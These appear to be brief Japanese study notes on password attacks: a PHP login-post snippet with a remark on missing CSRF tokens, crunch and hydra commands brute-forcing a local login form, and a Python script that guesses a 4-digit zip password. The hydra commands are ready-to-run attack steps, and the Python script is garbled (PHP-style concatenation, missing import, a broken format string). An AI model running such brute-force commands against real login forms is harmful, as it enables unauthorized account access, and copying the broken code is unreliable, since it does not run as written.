$http->post('username', '****')
->post('password', '****')
->post('action', 'login2')
->fetch('https://www.value-domain.com/login.php');
CSRF対策トークンがないと簡単に攻撃されてしまう
### hydraでBrute-force
$ crunch 4 4 -o password.txt
$ hydra -l test -P password.txt 127.0.0.1 http-post-form ‘/login_sql.php:name=^USER^&password=^PASS^:ログイン失敗です’
hydra github
https://github.com/vanhauser-thc/thc-hydra
### Pythonで4桁のパスワードのBrute-force攻撃
import zipfile
import pandas as pd
file_path = 'energy.zip'
size = 4
chars = '0123456789'
count = 0
numbers = []
with zipfile.ZipFile(file_path . 'r') as zf:
for i in range(100000):
pwd = bytes(''.join(random.choices(chars, k=size)), 'UTF-8')
numbers.append(pwd)
try:
zf.extractall(path='.'. pwd=pwd)
print('このPDFファイルのパスワードは、[]です'.format(pwd))
break
except Exception as e:
count += 1
print('総当たり攻撃で解凍を試した回数は:' . count . '回です')
df = pd.DataFrame(numbers)
